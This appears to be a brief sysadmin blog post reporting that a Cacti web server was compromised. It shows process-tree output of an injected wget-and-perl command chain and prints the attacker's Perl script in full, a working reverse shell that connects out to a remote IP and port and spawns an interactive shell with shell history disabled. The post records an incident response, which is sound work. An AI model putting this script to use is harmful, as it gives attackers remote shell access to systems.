Cacti gets hacked

I noticed a www process spinning away on bean:

root@bean~$ptree 15591
405 /usr/local/apache2/bin/httpsd -k start
438 /usr/local/apache2/bin/httpsd -k start
15591 sh -c wget;mv ping.txt temp2006;perl temp2006 203.11
14402 perl temp2006 3303

and then after looking at the code

root@bean~$more ping.txt
use Socket;
use FileHandle;
$IP = $ARGV[0];
$PORT = $ARGV[1];
socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname(‘tcp’));
connect(SOCKET, sockaddr_in($PORT,inet_aton($IP)));
open(STDIN, “>&SOCKET”);
system(“id;pwd;uname -a;w;HISTFILE=/dev/null /bin/sh -i”);

noticed that it looked like a known hack attempt as documented here. So for the time being I’ve disabled web access until I can re-install a web zone.